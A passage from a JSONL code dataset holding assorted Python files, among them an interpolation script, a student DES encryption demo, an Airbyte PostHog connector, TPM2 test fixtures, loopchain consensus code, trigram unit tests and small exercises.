main(args)\n","sub_path":"airsenal/scripts/make_results_csv.py","file_name":"make_results_csv.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"256804816","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\ndef func_33(x):\n return np.exp(x) + x*np.log10(x) + x\n\nstart = 4.5\nend = 25\nstep = 0.5\n\nx = np.arange(start, end, step)\ny = func_33(x)\n\norder = 11 # order of polynom\nA = np.fliplr(np.vander(x, order))\nprint(\"A \", A)\ncoefs, _, _, _ = np.linalg.lstsq(A, y)\nprint(\"coefs \", coefs)\n\ncnt = 10 # number of points to plot\ninterp_x = np.linspace(start, end, cnt)\nprint(\"Interp_x\", interp_x)\n\nprint(interp_x)\ninterp_y = np.zeros(cnt)\n\nfor ind, ix in enumerate(interp_x):\n print(ind,ix)\n interp_y[ind] = np.sum(coefs * ix ** np.arange(0, order))\n\nprint(\"interp_y\",interp_y)\n\nplt.figure()\nplt.plot(interp_x, interp_y, '-b', label='Лінія інтерполяції')\nplt.plot(x, y, '*r', label='Значення у функції')\nplt.xlabel('Значення х')\nplt.ylabel('Значення y')\nplt.title('Інтерполяція Вандермонда')\nplt.show()","sub_path":"courses/2/vandermond.py","file_name":"vandermond.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"502118467","text":"from Crypto.Cipher import DES\r\nfrom Crypto.Util.Padding import pad\r\n#KELOMPOK 1\r\n\"\"\"\r\nBagas Aditya pramudana\t\t\t(V3920012) \r\nDion Aji cahyono\t\t\t\t(V3920018) \r\nIsnan Nur Ahmad Wijayakusuma\t(V3920029)\r\nIvan Fausta Dinata\t\t\t\t(V3920030) \r\nKreshna Pura Adi Wicaksana\t\t(V3920032) \r\n\"\"\"\r\n\r\n#Sintak b untuk bytes. 
key = b'23tfwk4j' #Key extended to 8 bytes; DES.new() rejects any other key length\r\npanjang_key = len(key) #Key length in bytes\r\ndata = b'A2g4j6F8' #Plaintext converted to bytes\r\npanjang_data = len(data) #Data length in bytes\r\n\r\n#ENKRIPSI (encryption)\r\nBLOCK_SIZE = 32 #Padding block size; a multiple of the 8-byte DES block\r\ndes = DES.new(key,DES.MODE_ECB) #Create the DES cipher object\r\npadded_txt = pad(data, BLOCK_SIZE) #Pad the plaintext up to BLOCK_SIZE\r\nhasil1 = des.encrypt(padded_txt) #Encrypt the padded plaintext\r\nif panjang_key != 8:\r\n    print('KEY must be exactly 8 bytes for DES')\r\nelse:\r\n    print('\\nEnkripsi:',hasil1) #Print the ciphertext\r\n\r\n#DEKRIPSI (decryption)\r\nif panjang_key != 8:\r\n    print('KEY must be exactly 8 bytes for DES')\r\nelse:\r\n    des = DES.new(key,DES.MODE_ECB)\r\n    hasil2 = des.decrypt(hasil1) #Decrypt back to the padded plaintext\r\n    print(\"\\nDekripsi:\",hasil2,\"\\n\") #Print the recovered (still padded) plaintext","sub_path":"Kelompok 1/DES_Crytodome_Python.py","file_name":"DES_Crytodome_Python.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"570792261","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec  8 15:20:09 2017\n\n@author: hpy2\n\"\"\"\n\nimport requests\nimport json\nimport hashlib\nfrom pyfiglet import Figlet\n\ndef main(filepath, trialchainip):\n    url = \"http://{0}:9000/trialchain/data_asset\".format(trialchainip)\n    with open(filepath, 'rb') as f:\n        data = f.read()\n    hasher = hashlib.md5()\n    hasher.update(data)\n    md5 = hasher.hexdigest()\n    r = requests.get(url, params={\"md5\": md5, \"trialchainip\": trialchainip})\n    response = r.json()\n    f = Figlet(font='slant')\n    print(f.renderText('TrialChain'))\n    ordered = {\n        'asset': response['asset'],\n        'sha256': response['sha256'],\n        'issuetxid': response['issuetxid'],\n        'source': response['source'],\n        'issued': response['issued'],\n        'validated': response['validated'],\n        'ethstatus': response['ethstatus'],\n        'confirmations': response['confirmations'],\n        'mchash': response['mchash'],\n        'ethtxid': response['ethtxid']\n    }\n    print(json.dumps(ordered, indent=4))\n","sub_path":"scripts/AssetChecker/src/checker/main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"10651256","text":"#\n# Copyright (c) 2021 Airbyte, Inc., all rights reserved.\n#\n\n\nimport math\nimport urllib.parse\nfrom abc import ABC, abstractmethod\nfrom typing import Any, Iterable, List, Mapping, MutableMapping, Optional, Sequence\n\nimport requests\nfrom airbyte_cdk.models import SyncMode\nfrom airbyte_cdk.sources.streams.http import HttpStream\n\n\nclass PosthogStream(HttpStream, ABC):\n    primary_key = \"id\"\n    data_field = \"results\"\n\n    def __init__(self, base_url: str, **kwargs):\n        super().__init__(**kwargs)\n        self._url_base = f\"{base_url}/api/\"\n\n    @property\n    def url_base(self) -> str:\n        return self._url_base\n\n    def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:\n        resp_json = response.json()\n        if resp_json.get(\"next\"):\n            next_query_string = urllib.parse.urlsplit(resp_json[\"next\"]).query\n            params = dict(urllib.parse.parse_qsl(next_query_string))\n            return params\n\n    def request_headers(self, **kwargs) -> Mapping[str, Any]:\n        return {\"Content-Type\": \"application/json\", \"User-Agent\": \"posthog-python/1.4.0\"}\n
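\n    # most endpoints wrap their records in a \"results\" list (see data_field above)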
\"posthog-python/1.4.0\"}\n\n def parse_response(self, response: requests.Response, stream_state: Mapping[str, Any], **kwargs) -> Iterable[Mapping]:\n response_data = response.json()\n if self.data_field:\n response_data = response_data.get(self.data_field)\n\n if isinstance(response_data, Sequence):\n yield from response_data\n elif response_data:\n yield response_data\n\n def request_params(\n self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, Any] = None, next_page_token: Mapping[str, Any] = None\n ) -> MutableMapping[str, Any]:\n\n params = {}\n if next_page_token:\n params.update(next_page_token)\n return params\n\n\nclass IncrementalPosthogStream(PosthogStream, ABC):\n \"\"\"\n Because endpoints has descending order we need to save initial state value to know when to stop pagination.\n start_date is used to as a min date to filter on.\n \"\"\"\n\n state_checkpoint_interval = math.inf\n\n def __init__(self, base_url: str, start_date: str, **kwargs):\n super().__init__(base_url=base_url, **kwargs)\n self._start_date = start_date\n self._initial_state = None # we need to keep it here because next_page_token doesn't accept state argument\n\n @property\n @abstractmethod\n def cursor_field(self) -> str:\n \"\"\"\n Defining a cursor field indicates that a stream is incremental, so any incremental stream must extend this class\n and define a cursor field.\n \"\"\"\n\n def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:\n \"\"\"\n Return next page token until we reach the page with records older than state/start_date\n \"\"\"\n response_json = response.json()\n data = response_json.get(self.data_field, [])\n latest_record = data[-1] if data else None # records are ordered so we check only last one\n\n if not latest_record or latest_record[self.cursor_field] > self._initial_state:\n return super().next_page_token(response=response)\n\n def get_updated_state(self, current_stream_state: MutableMapping[str, Any], latest_record: Mapping[str, Any]) -> Mapping[str, Any]:\n \"\"\"\n Return the latest state by comparing the cursor value in the latest record with the stream's most recent state object\n and returning an updated state object.\n \"\"\"\n latest_state = latest_record.get(self.cursor_field)\n current_state = current_stream_state.get(self.cursor_field) or latest_state\n return {self.cursor_field: max(latest_state, current_state)}\n\n def parse_response(self, response: requests.Response, stream_state: Mapping[str, Any], **kwargs) -> Iterable[Mapping]:\n \"\"\"\n Filter records by initial_state value\n \"\"\"\n data = super().parse_response(response=response, stream_state=stream_state, **kwargs)\n for record in data:\n if record.get(self.cursor_field) >= self._initial_state:\n yield record\n\n def read_records(\n self,\n sync_mode: SyncMode,\n cursor_field: List[str] = None,\n stream_slice: Mapping[str, Any] = None,\n stream_state: Mapping[str, Any] = None,\n ) -> Iterable[Mapping[str, Any]]:\n \"\"\"\n Initialize initial_state value\n \"\"\"\n stream_state = stream_state or {}\n self._initial_state = self._initial_state or stream_state.get(self.cursor_field) or self._start_date\n return super().read_records(sync_mode=sync_mode, cursor_field=cursor_field, stream_slice=stream_slice, stream_state=stream_state)\n\n\nclass Annotations(IncrementalPosthogStream):\n \"\"\"\n Docs: https://posthog.com/docs/api/annotations\n \"\"\"\n\n cursor_field = \"updated_at\"\n\n def path(self, **kwargs) -> str:\n return \"annotation\"\n\n def request_params(self, 
        params = super().request_params(stream_state=stream_state, **kwargs)\n        params[\"order\"] = f\"-{self.cursor_field}\"  # sort descending\n        return params\n\n\nclass Cohorts(PosthogStream):\n    \"\"\"\n    Docs: https://posthog.com/docs/api/cohorts\n    normal ASC sorting, but without filters like `since`\n    \"\"\"\n\n    def path(self, **kwargs) -> str:\n        return \"cohort\"\n\n\nclass Events(IncrementalPosthogStream):\n    \"\"\"\n    Docs: https://posthog.com/docs/api/events\n    \"\"\"\n\n    cursor_field = \"timestamp\"\n\n    def path(self, stream_slice: Mapping[str, Any] = None, **kwargs) -> str:\n        return \"event\"\n\n    def request_params(self, stream_state: Mapping[str, Any], **kwargs) -> MutableMapping[str, Any]:\n        params = super().request_params(stream_state=stream_state, **kwargs)\n        since_value = stream_state.get(self.cursor_field) or self._start_date\n        since_value = max(since_value, self._start_date)\n        params[\"after\"] = since_value\n        return params\n\n\nclass EventsSessions(PosthogStream):\n    \"\"\"\n    Docs: https://posthog.com/docs/api/events\n    \"\"\"\n\n    primary_key = \"global_session_id\"\n    data_field = \"result\"\n\n    def path(self, **kwargs) -> str:\n        return \"event/sessions\"\n\n    def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:\n        resp_json = response.json()\n        return resp_json.get(\"pagination\")\n\n\nclass FeatureFlags(PosthogStream):\n    \"\"\"\n    Docs: https://posthog.com/docs/api/feature-flags\n    \"\"\"\n\n    def path(self, **kwargs) -> str:\n        return \"feature_flag\"\n\n\nclass Insights(PosthogStream):\n    \"\"\"\n    Docs: https://posthog.com/docs/api/insights\n    Endpoint does not support incremental read because id, created_at and last_refresh are not ordered in any particular way\n    \"\"\"\n\n    def path(self, **kwargs) -> str:\n        return \"insight\"\n\n\nclass InsightsPath(PosthogStream):\n    \"\"\"\n    Docs: https://posthog.com/docs/api/insights\n    \"\"\"\n\n    primary_key = None\n    data_field = \"result\"\n\n    def path(self, **kwargs) -> str:\n        return \"insight/path\"\n\n\nclass InsightsSessions(PosthogStream):\n    \"\"\"\n    Docs: https://posthog.com/docs/api/insights\n    \"\"\"\n\n    primary_key = None\n    data_field = \"result\"\n\n    def path(self, **kwargs) -> str:\n        return \"insight/session\"\n\n\nclass Persons(PosthogStream):\n    \"\"\"\n    Docs: https://posthog.com/docs/api/people\n    \"\"\"\n\n    def path(self, **kwargs) -> str:\n        return \"person\"\n\n\nclass Trends(PosthogStream):\n    \"\"\"\n    Docs: https://posthog.com/docs/api/insights\n    \"\"\"\n\n    primary_key = None\n    data_field = \"result\"\n\n    def path(self, **kwargs) -> str:\n        return \"insight/trend\"\n\n\nclass PingMe(PosthogStream):\n    \"\"\"\n    Docs: https://posthog.com/docs/api/user\n    \"\"\"\n\n    data_field = None\n\n    def path(self, **kwargs) -> str:\n        return \"users/@me\"\n","sub_path":"airbyte-integrations/connectors/source-posthog/source_posthog/streams.py","file_name":"streams.py","file_ext":"py","file_size_in_byte":7893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"596310121","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct  5 17:38:05 2019\r\n\r\n@author: Modo\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport scipy.io\r\nimport matplotlib.pyplot as plt\r\nimport function_definition as fd\r\n\r\n## =========== Part 1: Loading and Visualizing Data =============\r\ndata = scipy.io.loadmat('ex3data1.mat') \r\nX = data['X'] \r\ny = data['y'].flatten()\r\nm = np.size(X, 0)\r\n\r\nsel = np.random.permutation(m)\r\n
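#keep the first 100 shuffled examples as a random display sample\r\n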
sel = X[sel[0:100],:]\r\nfd.displayData(sel)\r\n\r\n## ================ Part 2: Loading Parameters ================\r\nparam = scipy.io.loadmat('ex3weights.mat')\r\ntheta1 = param['Theta1']\r\ntheta2 = param['Theta2']\r\n\r\n## ================= Part 3: Implement Predict =================\r\npred = fd.predict(theta1,theta2,X)\r\nprint('Training Set Accuracy: %.2f%%' % (np.mean(pred == y) * 100))\r\n\r\nrp = np.random.permutation(m)\r\nfor i in range(m):\r\n    print('\\nDisplaying Example Image\\n')\r\n    plt.matshow(X[rp[i], :].reshape(20,20))\r\n    plt.show()\r\n    \r\n    pred = fd.predict(theta1, theta2, X[rp[i], :].reshape(1,400))\r\n    print('\\nNeural Network Prediction: %d' % pred)\r\n    s = input('Paused - press enter to continue, q to exit:')\r\n    if s == 'q':\r\n        break\r\n    \r\n    \r\n","sub_path":"Machine Learning/ex3 Multi-class Classification and Neural Networks/Neural_Networks.py","file_name":"Neural_Networks.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"558573452","text":"import datetime\nfrom base_client import BaseClient\n\n\nclass Friends(BaseClient):\n    class FriendsNotFound(Exception):\n        @staticmethod\n        def msg():\n            print('Friends not found')\n\n    method = 'friends'\n    http_method = 'get'\n\n    def __init__(self, uid):\n        self.uid = uid\n\n    def get_params(self):\n        return {'user_id': self.uid, 'fields': 'bdate'}\n\n    def response_handler(self, response):\n        friends = response.json().get('response')\n        if not friends:\n            raise self.FriendsNotFound\n\n        ages = []\n        today = datetime.datetime.today()\n\n        for friend in friends:\n            date = friend.get('bdate')\n\n            try:\n                dt = datetime.datetime.strptime(date, '%d.%m.%Y')\n            except TypeError:\n                continue\n            except ValueError:\n                continue\n\n            age = today.year - dt.year\n            if today.month < dt.month:\n                age -= 1\n            elif today.month == dt.month and today.day < dt.day:\n                age -= 1\n\n            ages.append(age)\n\n        return ages\n","sub_path":"friends.py","file_name":"friends.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"512306791","text":"import os\nimport time\nimport tempfile\nimport unittest\nimport contextlib\n\nfrom tpm2_pytss import tcti\nfrom tpm2_pytss.esys import ESYS\nfrom tpm2_pytss.fapi import FAPI, FAPIConfig\nfrom tpm2_pytss.exceptions import TPM2Error\nfrom tpm2_pytss.util.simulator import SimulatorTest\n\nENV_TCTI = \"PYESYS_TCTI\"\nENV_TCTI_DEFAULT = \"mssim\"\nENV_TCTI_CONFIG = \"PYESYS_TCTI_CONFIG\"\nENV_TCTI_CONFIG_DEFAULT = None\n\nTCTI_RETRY_TRIES = 50\nTCTI_RETRY_TIMEOUT = 0.5\n\n\nclass TCTIRetry:\n    def __init__(\n        self, i=0, timeout=TCTI_RETRY_TIMEOUT, tries=0, max_tries=TCTI_RETRY_TRIES\n    ):\n        self.i = i\n        self.timeout = timeout\n        self.tries = tries\n        self.max_tries = max_tries\n        self.success = False\n\n    def __str__(self):\n        return \"%s(i=%d, timeout=%f, tries=%d, max_tries=%d, success=%s)\" % (\n            self.__class__.__qualname__,\n            self.i,\n            self.timeout,\n            self.tries,\n            self.max_tries,\n            self.success,\n        )\n\n\n@contextlib.contextmanager\ndef retry_tcti_catch(retry):\n    retry.success = True\n    try:\n        yield retry\n    except TPM2Error as error:\n        retry.success = False\n        if not \"tcti:IO failure\" in str(error):\n            raise\n        time.sleep(retry.timeout)\n        retry.tries += 1\n        retry.timeout *= 1.08\n        print(retry)\n        if retry.tries > retry.max_tries:\n            raise\n\n\ndef retry_tcti_loop(timeout=TCTI_RETRY_TIMEOUT, max_tries=TCTI_RETRY_TRIES):\n
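    \"\"\"Yield the same TCTIRetry object until a pass through retry_tcti_catch succeeds.\"\"\"\n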
    retry = TCTIRetry(i=-1, timeout=timeout, max_tries=max_tries)\n    while not retry.success:\n        retry.i += 1\n        yield retry\n\n\nclass BaseTestESYS(SimulatorTest, unittest.TestCase):\n    \"\"\"\n    ESYS tests should subclass from this\n    \"\"\"\n\n    def setUp(self):\n        super().setUp()\n        self.esys = ESYS()\n        self.tcti = tcti.TCTI.load(os.getenv(ENV_TCTI, default=ENV_TCTI_DEFAULT))\n        self.tcti_config = os.getenv(\n            ENV_TCTI_CONFIG, default=\"port=%d\" % (self.simulator.port)\n        )\n        # Create a context stack\n        self.ctx_stack = contextlib.ExitStack().__enter__()\n        # Enter the contexts\n        for retry in retry_tcti_loop():\n            with retry_tcti_catch(retry):\n                self.tcti_ctx = self.ctx_stack.enter_context(\n                    self.tcti(config=self.tcti_config)\n                )\n                self.esys_ctx = self.ctx_stack.enter_context(self.esys(self.tcti_ctx))\n        # Call Startup and clear the TPM\n        self.esys_ctx.Startup(self.esys_ctx.TPM2_SU_CLEAR)\n        # Set the timeout to blocking\n        self.esys_ctx.SetTimeout(self.esys_ctx.TSS2_TCTI_TIMEOUT_BLOCK)\n\n    def tearDown(self):\n        super().tearDown()\n        self.ctx_stack.__exit__(None, None, None)\n\n\nclass BaseTestFAPI(SimulatorTest, unittest.TestCase):\n    \"\"\"\n    FAPI tests should subclass from this\n    \"\"\"\n\n    def setUp(self):\n        super().setUp()\n        # Create a context stack\n        self.ctx_stack = contextlib.ExitStack().__enter__()\n        # Create temporary directories\n        self.user_dir = self.ctx_stack.enter_context(tempfile.TemporaryDirectory())\n        self.log_dir = self.ctx_stack.enter_context(tempfile.TemporaryDirectory())\n        self.system_dir = self.ctx_stack.enter_context(tempfile.TemporaryDirectory())\n        # Create the FAPI object\n        self.fapi = FAPI(\n            FAPIConfig.default()._replace(\n                user_dir=self.user_dir,\n                system_dir=self.system_dir,\n                log_dir=self.log_dir,\n                tcti=\"mssim:port=%d\" % (self.simulator.port,),\n            )\n        )\n        # Enter the contexts\n        for retry in retry_tcti_loop():\n            with retry_tcti_catch(retry):\n                self.fapi_ctx = self.ctx_stack.enter_context(self.fapi)\n\n    def tearDown(self):\n        super().tearDown()\n        self.ctx_stack.__exit__(None, None, None)\n","sub_path":"tests/base_esys.py","file_name":"base_esys.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"401982038","text":"# Copyright 2018 ICON Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"A base class of consensus for the loopchain\"\"\"\nimport logging\nfrom abc import ABCMeta, abstractmethod\nfrom loopchain import configure as conf\nfrom loopchain.blockchain import BlockBuilder\nfrom loopchain.blockchain import TransactionVersions, Transaction, TransactionStatusInQueue, TransactionVerifier\n\n\nclass ConsensusBase(metaclass=ABCMeta):\n    \"\"\"A class representing the consensus algorithm of LoopChain\n    \"\"\"\n\n    def __init__(self, blockmanager):\n        self._blockmanager = blockmanager\n        self._channel_name = blockmanager.channel_name\n        self._made_block_count = 0\n        self._blockchain = self._blockmanager.get_blockchain()\n        self._txQueue = self._blockmanager.get_tx_queue()\n
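        # transactions queued here are drained by _makeup_block() below\n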
\n    @property\n    def made_block_count(self):\n        return self._made_block_count\n\n    def stop(self):\n        pass\n\n    @abstractmethod\n    async def consensus(self):\n        \"\"\"The consensus algorithm invoked from the Block Manager's thread loop\n        \"\"\"\n        pass\n\n    def _makeup_block(self):\n        block_builder = BlockBuilder.new(\"0.1a\")\n\n        tx_versions = TransactionVersions()\n        while self._txQueue:\n            if len(block_builder) >= conf.MAX_TX_SIZE_IN_BLOCK:\n                logging.debug(f\"consensus_base total size({len(block_builder)}) \"\n                              f\"count({len(block_builder.transactions)}) \"\n                              f\"_txQueue size ({len(self._txQueue)})\")\n                break\n\n            tx: 'Transaction' = self._txQueue.get_item_in_status(\n                TransactionStatusInQueue.normal,\n                TransactionStatusInQueue.added_to_block\n            )\n            if tx is None:\n                break\n\n            tx_hash_version = tx_versions.get_hash_generator_version(tx.version)\n            tv = TransactionVerifier.new(tx.version, tx_hash_version)\n\n            try:\n                tv.verify(tx, self._blockchain)\n            except Exception as e:\n                logging.warning(f\"tx hash invalid. tx: {tx}\")\n            else:\n                block_builder.transactions[tx.hash] = tx\n\n        return block_builder\n","sub_path":"loopchain/peer/consensus_base.py","file_name":"consensus_base.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"246473614","text":"\"\"\"\n    Given an array, rotate its elements to the right by k steps, where k is non-negative.\n\n    Example 1:\n    Input: [1,2,3,4,5,6,7] and k = 3\n    Output: [5,6,7,1,2,3,4]\n    Explanation:\n    rotate right by 1 step: [7,1,2,3,4,5,6]\n    rotate right by 2 steps: [6,7,1,2,3,4,5]\n    rotate right by 3 steps: [5,6,7,1,2,3,4]\n\n    Example 2:\n    Input: [-1,-100,3,99] and k = 2\n    Output: [3,99,-1,-100]\n    Explanation:\n    rotate right by 1 step: [99,-1,-100,3]\n    rotate right by 2 steps: [3,99,-1,-100]\n\n    Notes:\n    Come up with as many solutions as you can; there are at least three different ways to solve this problem.\n    Use an in-place algorithm with O(1) extra space.\n    https://leetcode-cn.com/problems/rotate-array\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n    def rotate(self, nums: List[int], k: int) -> None:\n        return self.use_reverse(nums, k)\n\n    @classmethod\n    def use_loop(cls, nums: List[int], k: int) -> None:\n        nums_len = len(nums)\n        k = k % nums_len\n\n        move_times = index = 0\n\n        while index < len(nums):\n            value = nums[index]\n            new_index = (index + k) % nums_len\n\n            while True:\n                old_value = nums[new_index]\n\n                # update the value\n                nums[new_index] = value\n                move_times += 1\n\n                new_index = (new_index + k) % nums_len\n                value = old_value\n\n                if new_index == index:\n                    move_times += 1\n                    nums[new_index] = value\n                    break\n            index += 1\n\n            if move_times == nums_len:\n                break\n\n    @classmethod\n    def use_reverse(cls, nums: List[int], k: int) -> None:\n        k = k % len(nums)\n        cls.reversed_nums(nums, 0, len(nums) - 1)\n        cls.reversed_nums(nums, 0, k - 1)\n        cls.reversed_nums(nums, k, len(nums) - 1)\n\n    @classmethod\n    def reversed_nums(cls, nums: List[int], start: int, end: int) -> None:\n        while start < end:\n            nums[start], nums[end] = nums[end], nums[start]\n            start += 1\n            end -= 1\n","sub_path":"algorithm/LeetCode_189_旋转数组.py","file_name":"LeetCode_189_旋转数组.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"467942627","text":"import unittest\nfrom mock import patch, mock_open\nfrom collections import Counter\nfrom Trigram import Trigram\n\nfrom sys import version_info\nif version_info.major == 2:\n    import __builtin__ as builtins\nelse:\n    import builtins\n\nclass Test_Trigram(unittest.TestCase):\n\n    # Class-wide Tests\n    def test_trigram_constructor_saves_input_text(self):\n        text = 'the quick brown fox jumped over the fence'\n        trigram = Trigram('the quick brown fox jumped 
over the fence')\n self.assertEqual(trigram.input_text, text)\n\n def test_trigram_constructor_default_is_empty_string(self):\n trigram = Trigram()\n self.assertEqual(trigram.input_text, '')\n\n def test_trigram_constructor_instantiates_empty_trigram_map_dict(self):\n trigram = Trigram()\n self.assertEqual(trigram.map, {})\n\n # parse() tests\n def test_parse_makes_trigram_map_a_dictionary(self):\n trigram = Trigram('the quick brown fox jumped over the fence')\n trigram.parse()\n self.assertIsInstance(trigram.map, dict)\n\n def test_parse_raises_error_if_text_has_less_than_three_words(self):\n trigram = Trigram('two words')\n self.assertRaises(ValueError, trigram.parse)\n\n def test_parse_adds_dictionary_entry_of_first_two_words(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n self.assertEqual('three whole', trigram.map.keys()[0])\n\n def test_parse_return_dict_values_are_counters(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n self.assertIsInstance(trigram.map['three whole'], Counter)\n\n def test_parse_return_dict_has_second_bigram_as_key(self):\n trigram = Trigram('four whole real words')\n trigram.parse()\n self.assertIsInstance(trigram.map['whole real'], Counter)\n\n def test_parse_return_dict_value_counters_increment_to_1(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n self.assertEqual(1, trigram.map['three whole']['words'])\n\n def test_parse_return_dict_value_counters_increment_to_2(self):\n trigram = Trigram('three whole words and three whole words')\n trigram.parse()\n self.assertEqual(2, trigram.map['three whole']['words'])\n\n def test_running_parse_twice_with_append_map_true_double_counts(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n trigram.parse(append_map=True)\n self.assertEqual(2, trigram.map['three whole']['words'])\n\n # predict_next_word tests\n def test_predict_next_word_returns_string(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n next_word = trigram.predict_next_word(bigram = 'three whole')\n self.assertIsInstance(next_word, str)\n\n def test_predict_next_word_errors_if_no_map(self):\n trigram = Trigram()\n self.assertRaises(ValueError, trigram.predict_next_word, 'anything')\n\n def test_predict_next_word_returns_third_word_for_trigram_input(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n next_word = trigram.predict_next_word(bigram = 'three whole')\n self.assertEqual('words', next_word)\n\n def test_predict_next_word_returns_only_possible_answer_for_longer_corpus(self):\n trigram = Trigram('three whole words are not enough to properly test '\n 'this method so how about fifteen')\n trigram.parse()\n next_word = trigram.predict_next_word(bigram = 'enough to')\n self.assertEqual('properly', next_word)\n\n def test_predict_next_word_returns_most_likely_word(self):\n trigram = Trigram('two words this '\n 'two words that '\n 'two words this')\n trigram.parse()\n next_word = trigram.predict_next_word(bigram = 'two words')\n self.assertEqual('this', next_word)\n\n def test_predict_next_word_throws_key_error_if_map_missing_bigram(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n self.assertRaises(KeyError, trigram.predict_next_word, 'a word')\n\n # generate_text tests\n def test_generate_text_returns_string(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n text = trigram.generate_text(start_text = 'three whole')\n self.assertIsInstance(text, str)\n\n def 
test_generate_text_errors_if_start_text_is_less_than_two_words(self):\n        trigram = Trigram('three whole words')\n        trigram.parse()\n        self.assertRaises(ValueError, trigram.generate_text, 'three')\n\n    def test_generate_text_returns_third_whole_trigram(self):\n        trigram = Trigram('three whole words')\n        trigram.parse()\n        text = trigram.generate_text(start_text = 'three whole')\n        self.assertEqual('three whole words', text)\n\n    def test_generate_text_returns_only_start_text_if_no_match(self):\n        trigram = Trigram('three whole words')\n        trigram.parse()\n        text = trigram.generate_text(start_text = 'what the')\n        self.assertEqual('what the', text)\n\n    def test_generate_text_limited_by_max_words_property(self):\n        trigram = Trigram('sorry sorry sorry')\n        trigram.parse()\n        text = trigram.generate_text(start_text = 'sorry sorry',\n                                     max_words = 4)\n        self.assertEqual('sorry sorry sorry sorry', text)\n\n    # load_from_file tests\n    @patch('Trigram.os.path')\n    def test_mapbox_load_from_file_checks_for_file_existance(self,\n                                                             mock_os_path):\n        mock_os_path.exists.return_value = True\n        trigram = Trigram()\n        with patch.object(builtins, 'open',\n                          mock_open(read_data='three whole words')):\n            trigram.load_from_file(filename = 'filename.txt')\n        mock_os_path.exists.assert_called_once_with('filename.txt')\n\n    @patch('Trigram.os.path')\n    def test_mapbox_load_from_file_errors_if_no_file(self, mock_os_path):\n        mock_os_path.exists.return_value = False\n        trigram = Trigram()\n        self.assertRaises(IOError, trigram.load_from_file, 'filename.txt')\n\n    @patch('Trigram.os.path')\n    def test_mapbox_load_from_file_populates_input_text(self, mock_os_path):\n        mock_os_path.exists.return_value = True\n        trigram = Trigram()\n        with patch.object(builtins, 'open',\n                          mock_open(read_data='three whole words')):\n            trigram.load_from_file(filename = 'filename.txt')\n        self.assertEqual('three whole words', trigram.input_text)\n","sub_path":"trigrams/mbramson/test_trigram.py","file_name":"test_trigram.py","file_ext":"py","file_size_in_byte":6594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"296142734","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis program asks the user to enter a sentence, prints the number of words and\nthe occurrences of each word along with the number of letters in that word.\n\"\"\"\n\ndef get_num_letters(word):\n    \"\"\"\n    Return number of letters in a word.\n    Would be easier just to use len() directly than this function...\n    \"\"\"\n    return len(word)\n\ndef get_unique_words(sentence):\n    \"\"\"\n    Return a dictionary with each unique word as the key and number of occurrences\n    as the value in a given sentence.\n    \"\"\"\n    words = {}\n    # Split sentence by space\n    for word in sentence.split(' '):\n        # convert to lowercase\n        word_lower = word.lower()\n        # If the word exists, increase the count\n        if words.get(word_lower):\n            words[word_lower] += 1\n        # If not, add the word to the dictionary and set count to 1\n        else:\n            words[word_lower] = 1\n\n    return words\n\ndef main():\n    # Get a sentence from the user\n    user_input = input('Enter a sentence: ')\n\n    # Print number of words in the sentence\n    print('There are {} words in your sentence.'.format(len(user_input.split(' '))))\n    # Print word, occurrence and number of letters for each unique word\n    for word, count in get_unique_words(user_input).items():\n        print('The word \"{}\"\\toccurs {} times, \\tand has {} letters.'.format(word, count, get_num_letters(word)))\n\n\nif __name__ == \"__main__\":\n    
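# demo: \"hi hi there\" reports 3 words, with \"hi\" occurring twice\n    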
